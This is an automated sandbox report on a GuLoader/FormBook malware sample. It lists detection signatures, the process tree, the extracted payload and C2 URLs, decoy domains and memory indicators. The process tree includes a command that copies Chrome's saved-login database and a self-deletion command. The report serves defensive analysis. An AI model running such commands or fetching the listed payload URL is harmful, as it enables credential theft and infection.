Windows Analysis Report BL_CI_PL.exe

Overview

General Information

Sample Name: BL_CI_PL.exe
Analysis ID: 530346
MD5: 75a9a6347c5ae5d8bd464c195b9802bb
SHA1: 96da47f0e279f810714afdc362c15f2e0eae6dd7
SHA256: 02854ef9c13129f6336db1b1d33b5255a88a5657b5e66ebda12b733a2c421ff7

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Tries to resolve many domain names, but no domain seems valid
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64native
  • BL_CI_PL.exe (PID: 1880 cmdline: "C:\Users\user\Desktop\BL_CI_PL.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
    • BL_CI_PL.exe (PID: 432 cmdline: "C:\Users\user\Desktop\BL_CI_PL.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
      • explorer.exe (PID: 4528 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • k4n8p7lb.exe (PID: 5888 cmdline: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
          • k4n8p7lb.exe (PID: 3200 cmdline: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
        • k4n8p7lb.exe (PID: 5096 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
          • k4n8p7lb.exe (PID: 5788 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
        • NETSTAT.EXE (PID: 4520 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)
        • wscript.exe (PID: 380 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
        • k4n8p7lb.exe (PID: 8012 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
          • k4n8p7lb.exe (PID: 3016 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
        • k4n8p7lb.exe (PID: 7704 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
          • k4n8p7lb.exe (PID: 7216 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
      • ipconfig.exe (PID: 4888 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
        • cmd.exe (PID: 384 cmdline: /c del "C:\Users\user\Desktop\BL_CI_PL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • cmd.exe (PID: 4948 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • firefox.exe (PID: 7688 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://bgreenidaho.com/Newfile/bin_UFDek247.bin"}

Threatname: FormBook

{"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000018.00000000.28530443036.0000000022327000.00000004.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth |
  • 0x36d4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000001F.00000002.30058808750.0000000002380000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
0000000A.00000000.25494294503.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000001F.00000002.30058808750.0000000002380000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://bgreenidaho.com/Newfile/bin_UFDek247.bin"}
Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration)
Multi AV Scanner detection for submitted file
Source: BL_CI_PL.exe Virustotal: Detection: 19%
Yara detected FormBook
Antivirus detection for URL or domain
Source: http://www.dif-directory.xyz/n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c Avira URL Cloud: Label: phishing
Source: http://www.yghdlhax.xyz/n8ds/?lZOD=prkX5vIEewOKdb4uapSD5zP9OaJ72kAqHOW75HdD0V+URkfePb3G34/1ninLd5DC/lUo&y6AH=yHQDs Avira URL Cloud: Label: phishing
Source: http://www.yghdlhax.xyz/n8ds/ Avira URL Cloud: Label: phishing
Source: 24.0.firefox.exe.2232796c.1.unpack Avira: Label: TR/Dropper.Gen
Source: 24.2.firefox.exe.2232796c.0.unpack Avira: Label: TR/Dropper.Gen
Source: 29.2.wscript.exe.4f3796c.4.unpack Avira: Label: TR/Dropper.Gen
Source: 14.2.ipconfig.exe.3f3796c.4.unpack Avira: Label: TR/Dropper.Gen
Source: 14.2.ipconfig.exe.3591ee8.1.unpack Avira: Label: TR/Dropper.Gen
Source: 29.2.wscript.exe.2ac9e48.1.unpack Avira: Label: TR/Dropper.Gen
Source: 28.2.NETSTAT.EXE.2ed2880.1.unpack Avira: Label: TR/Dropper.Gen
Source: 28.2.NETSTAT.EXE.387796c.4.unpack Avira: Label: TR/Dropper.Gen
Source: 24.0.firefox.exe.2232796c.0.unpack Avira: Label: TR/Dropper.Gen
Source: BL_CI_PL.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49845 version: TLS 1.2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F2FA90 FindFirstFileW,FindNextFileW,FindClose,14_2_02F2FA90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F2FA89 FindFirstFileW,FindNextFileW,FindClose,14_2_02F2FA89

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Performs DNS queries to domains with low reputation
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://bgreenidaho.com/Newfile/bin_UFDek247.bin
Source: Malware configuration extractor URLs: www.ayudavida.com/n8ds/
Tries to resolve many domain names, but no domain seems valid
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Joe Sandbox View IP Address: 50.62.172.157
        Source: unknown Network traffic detected: DNS query count 32
        Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: ipconfig.exe, 0000000E.00000002.30172038806.0000000004C12000.00000004.00020000.sdmp, ipconfig.exe, 0000000E.00000003.29059324581.0000000003635000.00000004.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30171029681.000000000453C000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28478427328.0000000023002000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
        Source: ipconfig.exe, 0000000E.00000002.30172038806.0000000004C12000.00000004.00020000.sdmp, ipconfig.exe, 0000000E.00000003.29059324581.0000000003635000.00000004.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30171029681.000000000453C000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28478427328.0000000023002000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
        Source: ipconfig.exe, 0000000E.00000002.30172038806.0000000004C12000.00000004.00020000.sdmp, ipconfig.exe, 0000000E.00000003.29059324581.0000000003635000.00000004.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30171029681.000000000453C000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28478427328.0000000023002000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
        Source: BL_CI_PL.exe, 0000000A.00000003.26181792782.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26189181508.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25860584762.00000000008F8000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25858476756.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25859912712.00000000008F5000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861285392.00000000008F5000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25858886240.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861987953.00000000008F8000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29294372742.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29257058269.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29299837438.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256180897.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: BL_CI_PL.exe, 0000000A.00000003.26181792782.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26189181508.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25860584762.00000000008F8000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25858476756.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25859912712.00000000008F5000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861285392.00000000008F5000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25858886240.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861987953.00000000008F8000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29294372742.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29257058269.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29299837438.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256180897.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: explorer.exe, 0000000D.00000000.26114272250.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25973697287.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25878475451.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25922430683.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25997655299.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26089973057.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896814606.00000000112B7000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: explorer.exe, 0000000D.00000000.26114272250.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25973697287.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25878475451.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25922430683.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25997655299.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26089973057.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896814606.00000000112B7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: explorer.exe, 0000000D.00000000.25997352593.0000000011282000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26113928671.0000000011282000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896576995.0000000011282000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlYE
        Source: explorer.exe, 0000000D.00000000.26114272250.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25997655299.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896814606.00000000112B7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
        Source: explorer.exe, 0000000D.00000000.25884137732.000000000B010000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25967238414.0000000003800000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26095564586.000000000A260000.00000002.00020000.sdmpString found in binary or memory: http://schemas.micro
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: http://www.foreca.com
        Source: ipconfig.exe, 0000000E.00000002.30171163705.000000000472B000.00000004.00020000.sdmpString found in binary or memory: http://www.mummymotors.com
        Source: ipconfig.exe, 0000000E.00000002.30171163705.000000000472B000.00000004.00020000.sdmpString found in binary or memory: http://www.mummymotors.com/n8ds/
        Source: explorer.exe, 0000000D.00000000.25923523579.0000000009CA3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25879506622.0000000009CA3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26091037711.0000000009CA3000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/odirmCHITECT
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 0000000D.00000000.25892743156.000000000DC4C000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25991473088.000000000DC4C000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26108228042.000000000DC4C000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF
        Source: explorer.exe, 0000000D.00000000.25891843601.000000000DB97000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25944331523.00000000112A3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26114152872.00000000112A3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896724688.00000000112A3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25938131496.000000000DB97000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26107410049.000000000DB97000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000000D.00000000.26092066193.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25880373796.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25976374515.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25924643006.0000000009D81000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?9z
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?U
        Source: explorer.exe, 0000000D.00000000.25925791152.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26093468212.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25881260799.0000000009E62000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
        Source: k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/%
        Source: k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453696047.0000000000734000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin
        Source: k4n8p7lb.exe, 0000001A.00000003.29294372742.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29257058269.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29299837438.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256180897.0000000000795000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin%
        Source: k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin)
        Source: k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin9
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin=
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binQ
        Source: k4n8p7lb.exe, 0000001A.00000002.29299157566.0000000000738000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binentVersion
        Source: k4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binleK
        Source: k4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binn
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binu
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/U
        Source: ipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
        Source: explorer.exe, 0000000D.00000000.25932869418.000000000D6A8000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26101869145.000000000D6A8000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887437575.000000000D6A8000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
        Source: explorer.exe, 0000000D.00000000.25925791152.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26093468212.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25881260799.0000000009E62000.00000004.00000001.sdmpString found in binary or memory: https://excel.offi
        Source: explorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.com
        Source: explorer.exe, 0000000D.00000000.26105450586.000000000D8F1000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25936306207.000000000D8F1000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25890275345.000000000D8F1000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
        Source: DB1.20.drString found in binary or memory: https://login.live.com/
        Source: ipconfig.exe, 0000000E.00000002.30164352520.000000000362E000.00000004.00000001.sdmp, cmd.exe, 00000014.00000003.28467193676.0000000000B95000.00000004.00000001.sdmp, cmd.exe, 00000014.00000002.28470916171.0000000003200000.00000004.00000001.sdmp, DB1.20.drString found in binary or memory: https://login.live.com//
        Source: cmd.exe, 00000014.00000003.28467193676.0000000000B95000.00000004.00000001.sdmp, cmd.exe, 00000014.00000002.28470916171.0000000003200000.00000004.00000001.sdmp, DB1.20.drString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: ipconfig.exe, 0000000E.00000002.30164352520.000000000362E000.00000004.00000001.sdmp, cmd.exe, 00000014.00000003.28467193676.0000000000B95000.00000004.00000001.sdmp, cmd.exe, 00000014.00000002.28470916171.0000000003200000.00000004.00000001.sdmp, DB1.20.drString found in binary or memory: https://login.live.com/v104
